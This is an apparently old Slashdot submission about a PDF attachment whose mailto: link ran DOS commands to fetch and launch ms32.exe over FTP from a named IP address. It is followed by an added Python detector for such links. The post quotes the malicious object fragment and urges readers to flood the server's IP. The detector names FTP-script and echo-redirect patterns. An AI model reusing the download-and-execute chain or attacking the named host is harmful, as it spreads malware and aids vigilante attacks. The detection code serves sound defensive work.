Slashdot: News for Nerds
PDF virus targets Acrobat READER

hoggoth (414195) writes | more than 6 years ago

Worms 1

hoggoth (414195) writes "The recent outbreak of the 'Peachy' virus showed that PDFs can carry dangerous content. All of the news outlets are repeating Adobe's statement that only the full Acrobat suite can activate the virus, that the free Acrobat Reader is immune. However, as a victim of a PDF-carried virus, I can tell you it's not true.

This morning I got an email from a financial services firm I have an account with to an email address I set up just for that financial services firm. This led me to stupidly trust the email that contained a PDF attachment. When I clicked on it a window popped up and went away; very suspicious behavior. So I looked closer at the PDF file and found that it contained a mailto: that put some DOS commandline instructions in a file and executed them, which contacted a server, downloaded an executable, and ran it. The meat of the offending part is this:

14 0 obj7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>>

This calls cmd.exe with a long command that turns off your firewall, FTPs into the offending site, downloads a rogue version of ms32.exe, and runs it. The virus installed a number of files to my computer and modified the startup to run them. I *think* I got rid of it all, although one can never be sure today with rootkits and all. I googled all over, and I think this is 'breaking news'. Every outlet is still saying Acrobat Reader is safe.

Entities to Hate:

  • The virus server at 203.121.69.116
  • Financial services institutions that sell your private email address to marketers.
  • Adobe for allowing PDFs to execute cmd.com.
  • Adobe for lying about Acrobat Reader being safe.
  • Microsoft for their entire insecure operating system. Come on, outside data is allowed to run and TURN OFF THE FIREWALL?!

Please feel free to pound that FTP server's IP address with all the hate you can muster."
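A triage check for the kind of attachment described in the submission, as an added example that is not part of the original post: it pulls `/URI` action strings out of raw PDF bytes and flags `mailto:` targets that carry command-line content. The heuristic names, the simplified unescaping and the sample bytes are assumptions constructed for this example; URIs inside compressed object streams or hex strings are not covered.

```python
import re

# Literal string following a /URI key, allowing backslash-escaped characters.
# Limitation: unescaped nested parentheses are not handled.
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\()])*)\)", re.S)

# Heuristics chosen for this example, not a vendor signature set.
# '&' is left out of the metacharacters because legitimate mailto: links
# use it to separate header fields (?subject=..&body=..).
SUSPICIOUS = {
    "shell-metachar": re.compile(rb'[|<>^"]'),
    "script-or-exe": re.compile(rb"\.(?:cmd|bat|exe)\b", re.I),
    "ftp-script": re.compile(rb"\bftp\s+-s:", re.I),
    "echo-redirect": re.compile(rb"@?echo\b[^&]*>>", re.I),
}


def find_suspicious_uris(pdf_bytes):
    """Return (uri, indicator_names) for each mailto: URI that looks like a command."""
    findings = []
    for match in URI_RE.finditer(pdf_bytes):
        # Simplified PDF unescape: drop the backslash, keep the next byte.
        uri = re.sub(rb"\\(.)", rb"\1", match.group(1), flags=re.S)
        scheme = uri.split(b":", 1)[0].strip().lower()
        if scheme != b"mailto":
            continue
        hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(uri))
        if hits:
            findings.append((uri.decode("latin-1"), hits))
    return findings


# Constructed sample: a normal mailto link, a command-laden one, and a web link.
SAMPLE = (
    b"1 0 obj<</S/URI/URI(mailto:billing@example.invalid?subject=Invoice&body=Hi)>>endobj\n"
    b"2 0 obj<</URI(mailto:x@example.invalid&@echo constructed>>7&@start demo.cmd)/S/URI>>endobj\n"
    b"3 0 obj<</S/URI/URI(https://example.invalid/a?b=1&c=2)>>endobj\n"
)

if __name__ == "__main__":
    for uri, hits in find_suspicious_uris(SAMPLE):
        print(hits, uri)
```

A hit is a reason to quarantine the attachment and inspect it by hand, not proof of compromise.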
